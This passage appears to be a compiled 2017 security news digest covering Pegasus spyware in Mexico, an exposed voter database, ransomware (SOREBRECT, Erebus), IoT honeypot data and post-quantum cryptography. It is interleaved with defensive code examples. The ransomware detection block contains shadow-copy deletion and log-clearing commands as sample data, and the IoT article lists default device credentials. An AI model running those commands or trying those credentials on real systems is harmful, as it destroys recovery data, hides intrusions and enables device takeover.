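        "as": clamp_hard_limit(resource.RLIMIT_AS, as_max),
    }


def limits_conf_lines(domain, stack_max, as_max):
    """Render /etc/security/limits.conf entries (pam_limits) for `domain`,
    which may be a user name, '@group' or '*'. pam_limits expresses both
    the 'stack' and the 'as' items in kibibytes."""
    return [
        f"{domain:<12}hard  stack  {stack_max // KIB}",
        f"{domain:<12}hard  as     {as_max // KIB}",
    ]


if __name__ == "__main__":
    # Apply to this shell-like process, then print what a local user would get.
    print(apply_stack_clash_limits())
    print("\n".join(limits_conf_lines("*", 8 * MIB, 4096 * MIB)))
```

A low RLIMIT_AS will break memory-hungry services (JVMs, databases), so the value has to be chosen per service and tested; the limits also do nothing for processes already running, which is why the articles pair the workaround with a reboot. It remains a stop-gap: the durable fix is the kernel update and rebuilding userland with -fstack-check.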


Mexican Journalists, Activists Accuse Govt of Spying on Them

20.6.2017 securityweek BigBrothers
A group of prominent journalists and activists in Mexico accused the government Monday of spying on them, saying their phones had been hacked with Israeli spyware sold exclusively to the state.

The group has pressed charges with the attorney general's office, accusing the government of illegally accessing private communications and other offenses, it announced at a press conference.

The nine plaintiffs at the press conference included journalists who have published embarrassing exposes on government corruption and activists who have investigated human rights violations by the state.

"This is an operation by the Mexican state, in which state agents -- far from doing what they should legally do -- have used our resources, our taxes, our money to commit serious abuses," said journalist Carmen Aristegui.

Aristegui, a well-known reporter, is known in Mexico for a 2014 expose revealing that President Enrique Pena Nieto's wife had bought a $7 million Mexico City mansion from a government contractor.

She is among the 76 cases the plaintiffs say they have documented of high-tech spyware being installed on their phones and those of their families and associates.

"What does the Mexican president have to say today about this treacherous, illegal spying?" Aristegui said.

Victims said they received text messages with eye-catching news headlines, social media posts or even communications from the United States embassy -- all of which were fake.

The messages would prompt users to click on a link that would secretly install the spyware on their phones.

The software in question, known as Pegasus, effectively turns a target's cell phone into a pocket spy, accessing the user's communications, camera and microphone to enable a highly detailed level of surveillance.

The accusation came as The New York Times published a report detailing how Pegasus was used against top human rights lawyers, journalists and anti-corruption activists in Mexico.

The spyware is made by a secretive Israeli firm called NSO Group, owned by US private equity firm Francisco Partners Management.

According to the Times report, at least three Mexican federal agencies have purchased some $80 million of spyware from NSO Group since 2011.

The company, which claims it only sells Pegasus to governments, says it has an agreement with clients that the software be used only to target terrorists and criminals.


Republican Party Contractor Exposes Details of 198 Million American Voters

20.6.2017 securityweek BigBrothers
More than 1 terabyte of data compiled by three contractors of the U.S. Republican Party, including the details of 198 million American voters, was stored in a misconfigured database that could have been accessed by anyone, according to cyber resilience startup UpGuard.

Researcher Chris Vickery, who recently joined UpGuard as a risk analyst, discovered the unprotected Amazon Web Services (AWS) S3 bucket containing the data on June 12. Federal authorities were notified on June 14 – after all the data was downloaded – and the database was secured on the same day.

The database included information such as name, date of birth, home address, phone number, voter registration status, political views, and data on race and ethnicity.

UpGuard’s analysis showed that the unprotected cloud server was managed by Deep Root Analytics, a company that offers a data management platform for targeted TV advertising. The firm, which bills itself as “the most experienced group of targeters in Republican politics,” has taken responsibility for the incident.

Deep Root Analytics said the exposed data included both proprietary information and publicly available voter data. The company said there was no evidence that anyone other than Vickery accessed the files.

According to UpGuard, the exposed files suggested that at least two other companies, TargetPoint Consulting and Data Trust, also contributed to the database. TargetPoint is a market research and knowledge management firm whose services were used by President George W. Bush in his 2004 campaign, and Data Trust is the “exclusive data provider” of the Republican National Committee (RNC).

Deep Root Analytics, TargetPoint Consulting and Data Trust all played an important role in the recent campaign of President Donald Trump.

“Like political operatives, hackers constantly search for ways to move a person to take a particular action. This database, with political preferences and other private information for millions of Americans, is a treasure trove for creative hackers,” said Adam Levin, chairman and founder of CyberScout. “They can pose as anyone from a political action committee or local voting board to the IRS or a bank in phishing emails, to coax additional information from voters, such as social security numbers for identity theft, or they can influence the voting process directly.”

“Any organization that collects and stores data such as voter information must exercise the highest level of cyber hygiene. This includes repeated penetration testing and searches for and patches to new vulnerabilities as well as continual monitoring for unusual data exfiltration,” Levin added.

As for Deep Root Analytics’ failure to secure the data, Paul Fletcher, cyber security evangelist at Alert Logic, pointed out that Amazon offers the tools needed to protect cloud instances.

“The fact that this exposure was discovered on a public cloud site is irrelevant, in fact, if the AWS suite of security tools and log collection capabilities were properly implemented, this massive data exposure could’ve been avoided. The Amazon S3 server comes by default with an access control list (ACL), which needs to be properly set up, maintained and audited by the organization (and in this case), the organization’s customer – the GOP,” Fletcher told SecurityWeek. “Extra security is also available using server side encryption, again offered by AWS, but the responsibility to implement this solution is up to the public cloud customer.”

This was not the first time Vickery discovered an exposed database containing the details of U.S. voters. Back in December 2015, he stumbled upon personal information on 191 million Americans. A few months later, he identified a database storing the records of Mexican voters.
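Fletcher's point about the S3 access control list applies directly to this incident: a bucket becomes readable by anyone when its ACL grants a permission to the AllUsers group (or to AuthenticatedUsers, which is any AWS account) or when its bucket policy allows the wildcard principal. The block below is an added example, not UpGuard's or AWS's code; it checks an ACL and a policy offline, using constructed input shaped like the S3 GetBucketAcl and GetBucketPolicy responses (the owner ID, account ID and bucket name are placeholders).

```python
"""Offline check of an S3 bucket ACL and bucket policy for world-readable grants,
the kind of misconfiguration behind the exposure described above.
Added example; the input dicts are constructed in the shape of the S3
GetBucketAcl / GetBucketPolicy responses, not data from the incident."""
import json

# Canned group URIs S3 uses for anonymous and for any-signed-in-account grants.
ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"
AUTH_USERS = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
PUBLIC_GROUPS = {ALL_USERS: "anyone (anonymous)", AUTH_USERS: "any AWS account"}


def public_acl_grants(acl):
    """Return (who, permission) for every ACL grant made to a public group."""
    findings = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GROUPS:
            findings.append((PUBLIC_GROUPS[grantee["URI"]], grant["Permission"]))
    return findings


def _is_wildcard(principal):
    """True for Principal "*" or {"AWS": "*"} (also inside a list)."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS")
        return aws == "*" or (isinstance(aws, list) and "*" in aws)
    return False


def public_policy_statements(policy_json):
    """Return the Sids of Allow statements open to any principal with no Condition.
    Conditional wildcard statements are left for manual review."""
    policy = json.loads(policy_json)
    stmts = policy.get("Statement", [])
    if isinstance(stmts, dict):          # a single statement may be unwrapped
        stmts = [stmts]
    return [
        s.get("Sid", "<no Sid>")
        for s in stmts
        if s.get("Effect") == "Allow"
        and _is_wildcard(s.get("Principal"))
        and "Condition" not in s
    ]


def assess_bucket(acl, policy_json=None):
    """Combine both checks into a verdict ('public' / 'private') plus findings."""
    findings = [f"ACL grants {perm} to {who}" for who, perm in public_acl_grants(acl)]
    if policy_json:
        findings += [f"policy statement {sid} allows any principal"
                     for sid in public_policy_statements(policy_json)]
    return ("public" if findings else "private"), findings


# Constructed sample: the owner has FULL_CONTROL, but AllUsers was also given READ,
# and the policy carries one unconditional public-read statement.
SAMPLE_ACL = {
    "Owner": {"ID": "example-owner-id"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "example-owner-id"},
         "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "READ"},
    ],
}
SAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
         "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-bucket/*"},
        {"Sid": "TeamAccess", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::123456789012:role/analysts"},
         "Action": "s3:*", "Resource": "arn:aws:s3:::example-bucket/*"},
    ],
})

if __name__ == "__main__":
    verdict, findings = assess_bucket(SAMPLE_ACL, SAMPLE_POLICY)
    print(verdict)
    for f in findings:
        print(" -", f)
```

Real input comes from `aws s3api get-bucket-acl --bucket NAME` and `aws s3api get-bucket-policy --bucket NAME`, run on a schedule over every bucket in the account; the policy check deliberately flags only unconditional wildcard grants, so any statement that combines `"Principal": "*"` with a Condition still needs a human to decide whether the condition actually restricts who can read.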


Personal data of 200 million Americans accidentally ended up on the internet

19.6.2017 Novinky/Bezpečnost BigBrother
The personal data of nearly 200 million Americans was freely viewable on the internet because of an error made while processing it. An analytics firm working for the Republican Party mistakenly placed it on a publicly accessible server. The data, including addresses and phone numbers, may have been accessible for up to several months, US media report.
The 1.1 terabyte data set was discovered by cybersecurity expert Chris Vickery in unencrypted cloud storage. It had been placed there by Deep Root Analytics, which worked on voter analytics for the Republicans ahead of last year's election.

"We take full responsibility for this situation. Based on the information so far, we do not believe we were attacked by hackers," company founder Alex Lundry told Gizmodo.com, which reported the matter. He did not say how long the data had been publicly accessible, adding only that it had since been encrypted.

According to media reports, the company last updated the data in January. Besides names, addresses and phone numbers, the database contained, among other things, dates of birth and the political party with which the person had registered to vote.

American parties routinely use extensive voter databases, which they use to reach out to voters very actively before elections. According to available information, however, a disclosure of this scale appears to be the first of its kind.

"It is very worrying. This is not just sensitive, but the most sensitive information, from which you can read how people behave, what opinions and beliefs they hold," Frederike Kaltheuner of the NGO Privacy International told the BBC, noting that data volumes of this size are collected not only by political parties but also by online marketing companies.


Google Steps Up Efforts to Block Extremism, Following Facebook

19.6.2017 securityweek Social
Google is stepping up its efforts to block "extremist and terrorism-related videos" over its platforms, using a combination of technology and human monitors.

The measures announced Sunday come on the heels of similar efforts unveiled by Facebook last week, and follow a call by the Group of Seven leaders last month for the online giants to do more to curb online extremist content.

"While we and others have worked for years to identify and remove content that violates our policies, the uncomfortable truth is that we, as an industry, must acknowledge that more needs to be done," said a blog post by Google general counsel Kent Walker.

Walker said Google would devote more resources to apply artificial intelligence to suppress YouTube videos used in support of extremist actions.

"This can be challenging: a video of a terrorist attack may be informative news reporting if broadcast by the BBC, or glorification of violence if uploaded in a different context by a different user," he said.

"We will now devote more engineering resources to apply our most advanced machine learning research to train new 'content classifiers' to help us more quickly identify and remove extremist and terrorism-related content."

Google acknowledged that technology alone cannot solve the problem, and said that it would "greatly increase the number of independent experts" on the watch for videos that violate its guidelines.

"Machines can help identify problematic videos, but human experts still play a role in nuanced decisions about the line between violent propaganda and religious or newsworthy speech," Walker said.

Google plans to add 50 non-government organizations to the 63 it already works with to filter inappropriate content.

"This allows us to benefit from the expertise of specialized organizations working on issues like hate speech, self-harm, and terrorism," Walker wrote.

"We will also expand our work with counter-extremist groups to help identify content that may be being used to radicalize and recruit extremists."

A similar initiative was announced last week by Facebook, which earlier this year said it was adding 3,000 staff to track and remove violent video content.

Google's Walker said the online giant would start taking "a tougher stance on videos that do not clearly violate our policies," including videos that "contain inflammatory religious or supremacist content."

He said YouTube would expand its role in counter-radicalization efforts using an approach that "harnesses the power of targeted online advertising" to reach potential recruits for extremist groups and offers "video content that debunks terrorist recruiting messages."


Fileless, Code-Injecting Ransomware SOREBRECT Emerges

19.6.2017 securityweek Ransomware
A newly discovered ransomware family incorporates a combination of fileless attack and code-injection, Trend Micro security researchers warn.

Dubbed SOREBRECT, the threat was initially spotted a couple of months ago, when it managed to infect the systems and networks of organizations in the Middle East. The ransomware packs unusual encryption techniques, abuses the PsExec utility to perform code injection, and also focuses on remaining stealthy, the security company says.

The ransomware was fitted with a self-destruct routine that turns it into a fileless threat: it injects code into a legitimate system process before terminating its main binary. Furthermore, it goes to lengths to delete the affected system’s event logs and other artifacts in an attempt to hinder forensic analysis and prevent researchers from tracking the threat’s activities.

When discovered, SOREBRECT had a low distribution and concentrated on Middle Eastern countries like Kuwait and Lebanon. By early May, however, it was already found on computers in Canada, China, Croatia, Italy, Japan, Mexico, Russia, Taiwan, and the U.S., infecting industries including manufacturing, technology, and telecommunications.

“Given ransomware’s potential impact and profitability, it wouldn’t be a surprise if SOREBRECT turns up in other parts of the world, or even in the cybercriminal underground where it can be peddled as a service,” Trend Micro says.

During attacks, the malware abuses PsExec, a legitimate Windows command-line utility used by system admins to execute commands or run executable files on remote systems. This, researchers say, means that the attackers are already in possession of administrator credentials or that the remote machines were exposed or brute-forced.

SOREBRECT, however, isn’t the first ransomware family to misuse PsExec: SamSam, Petya, and its derivative PetrWrap also abuse the utility to install the ransomware on compromised servers or endpoints. The new threat, however, combines the malicious PsExec deployment with code injection.

“It injects its code into Windows’ svchost.exe process, while the main binary self-destructs. The combination is potent: once the deployed ransomware binary finishes execution and self-termination, the injected svchost.exe—a legitimate Windows service-hosting system process—resumes the execution of the payload (file encryption),” Trend Micro explains.

The researchers also argue that the ransomware’s code injection capability makes the attack more effective compared to using the Remote Desktop Protocol (RDP). Through PsExec, attackers can remotely execute commands, instead of providing a log-in session or manually transferring the malware to the target machine.

The ransomware also uses wevtutil.exe to delete the system’s event logs, and vssadmin to delete shadow copies, thus covering its tracks and preventing users from recovering their files. The malware also uses the TOR network to communicate with its command and control (C&C) server.

The threat can also encrypt files on network shares, the researchers warn. For that, it scans the network for asset discovery and enumerates open shares, including folders, content or peripherals that are readily accessible through the network. Next, it initiates a connection to the discovered share and, if both read and write access are available, it encrypts it.

To stay protected, IT/system administrators and information security professionals are advised to restrict user write permissions and limit privileges for PsExec. As usual, keeping files backed up at all times and keeping both systems and networks updated can prove helpful in case of an attack. Training employees on security and deploying multilayered security mechanisms are also highly important.
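The tradecraft described above (execution through PsExec, injection into svchost.exe, wevtutil clearing the event logs, vssadmin deleting shadow copies) maps onto a handful of process-creation rules that a SOC can run over endpoint telemetry. The block below is an added example, not Trend Micro's code; it evaluates those rules over constructed events with Sysmon-style fields (Image, CommandLine, ParentImage). The file paths, the sample sequences and the "svchost with an unusual parent" heuristic are assumptions for illustration.

```python
"""Detection logic for the SOREBRECT behaviours described above, run over
constructed process-creation events (Sysmon Event ID 1 style fields).
Added example; the events are invented samples, not telemetry from an infection."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str          # full path of the created process
    command_line: str   # its command line
    parent_image: str   # full path of the parent process


def _base(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


# Each rule is (name, predicate over one event).
RULES = [
    # wevtutil cl / clear-log wipes a log; SOREBRECT uses it to hinder forensics.
    ("event-log-clearing",
     lambda e: _base(e.image) == "wevtutil.exe"
     and re.search(r"\b(cl|clear-log)\b", e.command_line, re.I)),
    # vssadmin delete shadows removes the restore points the victim would need.
    ("shadow-copy-deletion",
     lambda e: _base(e.image) == "vssadmin.exe"
     and re.search(r"delete\s+shadows", e.command_line, re.I)),
    # PSEXESVC.exe is the service PsExec drops on the remote host; anything it
    # spawns was started remotely.
    ("psexec-remote-execution",
     lambda e: _base(e.parent_image) == "psexesvc.exe"),
    # Heuristic (assumption): svchost.exe is normally started by services.exe, so
    # another parent is worth a look when paired with the rules above.
    ("svchost-unusual-parent",
     lambda e: _base(e.image) == "svchost.exe"
     and _base(e.parent_image) != "services.exe"),
]


def evaluate(events):
    """Return (rule name, command line) hits in event order."""
    hits = []
    for e in events:
        for name, pred in RULES:
            if pred(e):
                hits.append((name, e.command_line))
    return hits


def triage(events):
    """Count distinct rules fired; several together form the described chain."""
    fired = {name for name, _ in evaluate(events)}
    return len(fired), sorted(fired)


# Constructed samples: routine admin activity, then a sequence mimicking the chain.
BENIGN = [
    ProcEvent(r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs",
              r"C:\Windows\System32\services.exe"),
    ProcEvent(r"C:\Windows\System32\wevtutil.exe", "wevtutil qe Security /c:5",
              r"C:\Windows\System32\cmd.exe"),
]
SUSPICIOUS = [
    ProcEvent(r"C:\Windows\PSEXESVC.exe", "PSEXESVC.exe",
              r"C:\Windows\System32\services.exe"),
    ProcEvent(r"C:\Users\Public\upd.exe", "upd.exe", r"C:\Windows\PSEXESVC.exe"),
    ProcEvent(r"C:\Windows\System32\svchost.exe", "svchost.exe",
              r"C:\Users\Public\upd.exe"),
    ProcEvent(r"C:\Windows\System32\vssadmin.exe",
              "vssadmin delete shadows /all /quiet",
              r"C:\Windows\System32\svchost.exe"),
    ProcEvent(r"C:\Windows\System32\wevtutil.exe", "wevtutil cl System",
              r"C:\Windows\System32\svchost.exe"),
]

if __name__ == "__main__":
    for label, batch in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, triage(batch), evaluate(batch))
```

Any single rule is noisy on its own (administrators clear logs and prune shadow copies too), which is why triage() reports how many distinct rules fired on one host: the article's chain trips all four within minutes, while routine maintenance trips one. In production the events come from the Sysmon or EDR stream rather than from the constructed lists.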


Cameras Top Source of IoT Attacks: Kaspersky

19.6.2017 securityweek IoT
Honeypots set up by Kaspersky Lab have provided some interesting information on Internet of Things (IoT) attacks, including the types of hacking attempts, attack sources, and the geographical distribution of compromised devices.

The security firm’s honeypots, designed to mimic various devices running Linux, were targeted within seconds of being deployed, and the number of attack attempts coming from unique IP addresses reached nearly 100,000 on some days.

These attacks often come from malware-infected devices that attempt to hijack other vulnerable systems. The compromised devices become part of botnets such as Mirai, Persirai and Amnesia, which are typically used to launch distributed denial-of-service (DDoS) attacks.

Roughly 85 percent of attempts leveraged the telnet protocol, while the rest used SSH. In the case of telnet attacks, the most common default credentials tried out by malware are root:xc3511, root:vizxv and admin:admin. The most commonly used credentials in the case of SSH are admin:default, admin:admin and support:support.

More than 63 percent of the attacks observed by Kaspersky came from DVR and IP camera systems, and nearly 20 percent came from routers and other networking devices.

A ZoomEye search conducted by researchers revealed nearly 7.5 million potentially vulnerable camera systems, and roughly 4 million potentially vulnerable routers.

Experts also pointed out that the attacks came from both home devices and networks housing enterprise-grade hardware, including point-of-sale (PoS) devices, TV broadcasting systems, physical security systems, environmental monitoring devices, programmable logic controllers (PLCs), power management systems, and a seismic monitoring station in Thailand.

As for the geographical distribution of the devices launching attacks on IoT systems, many were located in China (14%), Vietnam (12%), Russia (7%), Brazil (6%), Turkey (6%), Taiwan (6%) and Iran (4%).

Kaspersky has so far this year recorded more than 2 million attacks and over 11,000 unique IP addresses that served IoT malware. A majority of the IPs were located in Vietnam (2,100 IPs), Taiwan (1,300 IPs), Brazil (1,100 IPs), Turkey (700 IPs), South Korea (600 IPs), India (500 IPs) and the U.S. (430 IPs).

As for the number of malware downloads, a total of nearly 2 million downloads were traced to Thailand, Hong Kong, South Korea, the Netherlands, the United States and Seychelles.

“The existing competition in the DDoS market drives cybercriminals to look for new resources to launch increasingly powerful attacks. The Mirai botnet has shown that smart devices can be harnessed for this purpose – already today, there are billions of these devices globally, and by 2020 their number will grow to 20-50 billion devices, according to predictions by analysts at different companies,” Kaspersky researchers said in a blog post.


Quantum Computing's Threat to Public-key Cryptosystems

19.6.2017 securityweek Crypto
Quantum cryptography and Encryption Challenges

The Quantum Cryptography Problem

Fittingly, while we do know a little about 'what', we actually know little about 'when' we will get commercially viable quantum computers. The 'what' includes massively increased computational power. The 'when' is thought to be some time within the next 15 to 30 years.

When these two features are combined, we get the quantum cryptography problem: what are we going to do with current public-key encryption? Last year, scientists from Google and NASA suggested that D-Wave quantum technology could provide computing 100 million times faster than current conventional technology. This sort of power will 'break' current public-key cryptosystems.

As long ago as 1994, Peter Shor developed a quantum algorithm that can efficiently factor large numbers into their prime factors. It was not considered an urgent problem at the time, given the lack of quantum computers. Today, however, quantum computing is much closer. If it becomes commercially viable within the next 15 years, then cryptography already has a problem -- the world's data currently protected by algorithms such as RSA, the world's most popular public-key cryptosystem, will become readable. If it takes nearer thirty years, then there is potentially time to solve the problem.

The problem arises from the length of time it takes to develop and test new cryptography, and then to re-tool existing infrastructures with the new quantum-resistant algorithms. The solution is for security to develop 'quantum-safe' public-key cryptography as soon as possible. It is not thought so pressing for symmetric crypto systems -- that problem can probably be solved by using larger keys for symmetric algorithms such as AES and Triple DES, and by using longer output from hash functions.

Last year NIST announced a new competition (PDF) to develop quantum-resistant public-key cryptography. It called for proposals in the Fall of 2016, with a deadline of November 30, 2017. It expects a three-to-five-year analysis phase, with draft standards after a further two years. It announced that it would start to accept submissions on December 15, 2016.

One potential candidate was described by academics in France and Singapore on May 30, 2017 in a paper titled 'A New Public-Key Cryptosystem via Mersenne Numbers' (PDF). Mersenne numbers have long captured the imagination of mathematicians seeking an improvement to current public-key systems -- but not universally.

In 2009, Nathaniel Johnston, assistant professor at Mount Allison University, Canada, wrote, "Like all good myths, the Mersenne prime cryptography myth is so widespread because it is so close to being true." But the early interest in Mersenne numbers was that they could simply replace prime numbers with much larger prime numbers. This, according to Johnston, is the fallacy.

The new paper is different. "My comment was aimed at the idea that Mersenne primes can be used in RSA encryption (the 'standard' encryption scheme based on prime numbers), which is very false. However, [this paper] is about an entirely new encryption scheme that is built specifically around Mersenne numbers and Mersenne primes (and doesn't work with other primes). I have no reason to believe that there's any problem with this new scheme or its use of Mersenne numbers/primes."

The proposed new cryptosystem, says the paper, "is based on arithmetic modulo so called Mersenne numbers, i.e., numbers of the form p = 2^n - 1, where n is a prime." It does not strictly require that p is a Mersenne prime, but prefers it. There is a known partial attack when n is not prime, but the paper adds, "we are not aware of any attacks even if p = 2^n - 1 for any large enough prime n. If we are willing to relax this requirement, then we can choose other values of n to get the desired security."

The paper describes theoretical attacks against its proposal, including lattice-based attacks, meet-in-the-middle attacks, and guess and win attacks. In general, it finds the theory stands up well; but less so for active attacks that ask for the decryption of incorrectly formed ciphertext and use the answers to recover information about the key. The authors' solution is to include "a transformation specifically designed for our bit-by-bit encryption."
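To make the Mersenne-arithmetic idea concrete, here is an added toy example that is not code from the paper or the article: it checks the three properties of arithmetic modulo p = 2^n - 1 that such a scheme relies on (rotation, Hamming-weight bounds, complement negation) and runs a bit-by-bit encrypt/decrypt in the style of the paper's first version as recalled here (public key F/G mod p, sparse secrets of weight h); n = 127 and h = 5 are toy parameters chosen for speed and carry none of the paper's security claims.

```python
"""Added example, not code from the paper or the article: a toy
implementation of the Mersenne-number arithmetic such a scheme builds on,
with a bit-by-bit encrypt/decrypt in the style of the paper's first
version as recalled here (public key F/G mod p, sparse secrets of Hamming
weight h). n=127 and h=5 are toy parameters picked for speed and carry
none of the paper's security claims."""
import random

N = 127            # n prime; 2**127 - 1 is itself a Mersenne prime
P = (1 << N) - 1   # p = 2^n - 1
H = 5              # Hamming weight of the sparse secrets; correctness needs 4*h*h < n


def ham(x: int) -> int:
    """Hamming weight (number of 1 bits) of a non-negative integer."""
    return bin(x).count("1")


def rotate_left(x: int, k: int, n: int = N) -> int:
    """Rotate the n-bit string of x left by k bits."""
    k %= n
    mask = (1 << n) - 1
    return ((x << k) | (x >> (n - k))) & mask


def random_sparse(rng: random.Random, h: int = H, n: int = N) -> int:
    """Uniformly random n-bit value with exactly h one bits."""
    return sum(1 << b for b in rng.sample(range(n), h))


def check_weight_lemmas(seed: int, trials: int = 200) -> bool:
    """Three facts about Z/pZ for p = 2^n - 1 that make the scheme work:
    multiplying by 2^k rotates the bit string; Hamming weight is
    sub-additive under + and sub-multiplicative under *; and negation is
    bitwise complement, so ham(-x) == n - ham(x)."""
    rng = random.Random(seed)
    for _ in range(trials):
        a = random_sparse(rng, rng.randint(1, 20))
        b = random_sparse(rng, rng.randint(1, 20))
        k = rng.randrange(N)
        if (a * pow(2, k, P)) % P != rotate_left(a, k):
            return False
        if ham((a + b) % P) > ham(a) + ham(b) or ham((a * b) % P) > ham(a) * ham(b):
            return False
        if ham((-a) % P) != N - ham(a):
            return False
    return True


def keygen(rng: random.Random):
    """Secret: sparse F, G. Public: H = F * G^-1 mod p (p prime, so G is invertible)."""
    f, g = random_sparse(rng), random_sparse(rng)
    return (f * pow(g, -1, P)) % P, (f, g)


def encrypt_bit(pub: int, bit: int, rng: random.Random) -> int:
    """C = (-1)^bit * (A*H + B) mod p with fresh sparse A, B."""
    a, b = random_sparse(rng), random_sparse(rng)
    c = (a * pub + b) % P
    return c if bit == 0 else (-c) % P


def decrypt_bit(priv, c: int) -> int:
    """G*C = +-(A*F + B*G): weight <= 2h^2 means 0, weight >= n - 2h^2 means 1."""
    f, g = priv
    w = ham((g * c) % P)
    if w <= 2 * H * H:
        return 0
    if w >= N - 2 * H * H:
        return 1
    raise ValueError("malformed ciphertext: weight %d is in neither band" % w)


def roundtrip(bits, seed: int = 7):
    """Encrypt each bit under a fresh key pair and decrypt it again."""
    rng = random.Random(seed)
    pub, priv = keygen(rng)
    return [decrypt_bit(priv, encrypt_bit(pub, b, rng)) for b in bits]


def rejects_malformed(seed: int = 7) -> bool:
    """A ciphertext whose G*C lands between the two weight bands is rejected
    rather than guessed; the decryption-oracle attacks the article mentions
    depend on what a decryptor answers for exactly such inputs."""
    rng = random.Random(seed)
    pub, (f, g) = keygen(rng)
    mid = (1 << (N // 2)) - 1          # weight 63: in neither band
    c = (mid * pow(g, -1, P)) % P      # chosen so that G*C == mid
    try:
        decrypt_bit((f, g), c)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(check_weight_lemmas(1), roundtrip([1, 0, 1, 1, 0, 0, 1, 0]), rejects_malformed())
```

With these parameters decryption of a well-formed ciphertext never fails: B*G has weight at most 25 while -(A*F) has weight at least 102, so A*F + B*G can never vanish modulo p.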

"In this paper," the authors conclude, "we propose a simple new public-key encryption scheme. As with other public-key cryptosystems, the security of our cryptosystem relies on unproven assumptions... we mentioned some unsuccessful attempts we made at trying to break this scheme, and this led us to conjecture the security guarantee of our scheme." To verify their own conclusions, the authors urge other cryptographers "to try and find attacks on our scheme"; either conventional or quantum.

It may be that the results of any such feedback will determine whether the authors submit their proposal to the NIST quantum-resistant competition before the November deadline. SecurityWeek has reached out to the authors to see if this is the plan, and will update this article with any response it receives. What is clear, however, is that the increasingly urgent search for quantum-safe public-key cryptography is now in full swing.


Web Hosting Provider Pays $1 Million to Ransomware Attackers

19.6.2017 securityweek Ransomware
South Korean web hosting company Nayana agreed to pay $1 million in Bitcoin after a ransomware attack hit 153 Linux servers.

The attack took place June 10 and resulted in over 3,400 business websites the company hosts being encrypted. According to Nayana’s initial announcement, the attacker demanded 550 Bitcoins (over $1.6 million) to decrypt the infected files. Following negotiations, the ransom demand was lowered to 397.6 Bitcoins (around $1.01 million).

The payments, the company announced, will be made in three batches, and the attackers will decrypt the affected servers accordingly. Two payments were already made, and the company is currently in the process of recovering the data from the first two server batches.

The ransomware used in this attack, Trend Micro reveals, was Erebus, a piece of malware that was initially spotted in September 2016 and which was already seen in attacks earlier this year, when it packed Windows User Account Control bypass capabilities.

Apparently, someone ported the ransomware to Linux and is using it to target vulnerable servers. Running on Linux kernel 2.6.24.2, which was compiled back in 2008, Nayana’s website is vulnerable to a great deal of exploits that could provide attackers with root access to the server, such as DIRTY COW, Trend Micro notes.

The company’s website also uses Apache version 1.3.36 and PHP version 5.1.4, both released in 2006 and known to include vulnerabilities. Most likely, the vulnerable Linux installation was used as an entry point to run the Erebus ransomware on Nayana’s systems. The Apache version that Nayana uses runs as the user nobody (uid=99), and “a local exploit may have also been used in the attack,” the researchers say.

The ransomware appears heavily targeted to South Korea, although samples were submitted to VirusTotal from Ukraine and Romania too (Trend Micro suggests that there might be other researchers who have found the malware).

Erebus uses a sophisticated encryption method that makes decryption difficult without the RSA keys. The malware uses the RSA algorithm to encrypt AES keys and each infected file is encrypted with a unique AES key. However, the RSA-2048 public key is shared.

“The file is first scrambled with RC4 encryption in 500kB blocks with randomly generated keys. The RC4 key is then encoded with AES encryption algorithm, which is stored in the file. The AES key is again encrypted using RSA-2018 algorithm that is also stored in the file,” Trend Micro explains.

The ransomware targets Office documents, databases, archives, and multimedia files, being able to encrypt a total of 433 file types. However, the malware was built specifically to target and encrypt web servers and data stored in them, the researchers say.

“As exemplified by Nayana, Linux is an increasingly popular operating system and a ubiquitous element in the business processes of organizations across various industries—from servers and databases to web development and mobile devices. Data centers and hosting/storage service providers also commonly use machines running Linux, for instance,” Trend Micro concludes.


Database of Over 198 Million U.S. Voters Left Exposed On Unsecured Server
19.6.2017 thehackernews Incident

Information on more than 198 million United States citizens, that's over 60% of the US population, was exposed in what's believed to be the largest known exposure of voter-related data to date.
This blunder was caused by Deep Root Analytics (DRA), a data analytics firm employed by the US Republican National Committee (RNC), who "mistakenly" left sensitive personal details of more than 198 million US voters exposed on an unsecured Amazon S3 server.
Chris Vickery, a security researcher at UpGuard who discovered the exposed database, said anyone could have downloaded more than a terabyte of files containing voter data, without needing any password, from the Amazon S3 server maintained by DRA.
Vickery is the same security researcher who discovered over 191 million voter records stored in an unsecured database in late 2015. In April, Vickery also reported the exposure of information on 93 million Mexican voters.

Vickery discovered the exposed databases on June 12, which included uniquely identified data on each voter, including their first and last name, date of birth, phone number, home and mailing address, party affiliation, voter registration data, and ethnicity, along with a flag should the person appear on the federal Do-Not-Call registry.
Deep Root Analytics, a big data analytics firm that helps advertisers identify audiences for political ads, confirmed the exposure to Gizmodo in a statement on Monday, saying "We take full responsibility for this situation."
However, the server was secured two days later after Vickery responsibly reported the blunder to the federal regulators.
You would be surprised to know that the Republican National Committee paid Deep Root nearly a Million dollars between January 2015 and November 2016 for their work during the election and another $4.2 Million to TargetPoint.
It is believed that the US voters data was also compiled by at least two other contractors, TargetPoint Consulting Inc. and Data Trust.
According to the report, a smaller folder for the 2016 election included in the database contained files for Ohio and Florida, arguably the two most crucial battleground states.
Another folder, named 'data_trust' and apparently referencing Data Trust, was entirely downloadable by anyone accessing the URL of the database and contained two massive stores of personal information collectively representing 198 million potential voters.
"Consisting primarily of two file repositories, a 256 GB folder for the 2008 presidential election and a 233 GB folder for 2012, each containing fifty-one files - one for every state, as well as the District of Columbia," explained UpGuard's Dan O'Sullivan in a blog post.
Also, one folder called "Post-Elect 2016" contained information on voters’ likely views about topics like whether they voted for former President Barack Obama and US President Donald Trump’s "America First" foreign policy.
Deep Root has contracted a security firm, Stroz Friedberg, to perform a thorough investigation of the data exposure.


Spending on cloud protection is growing fastest of all

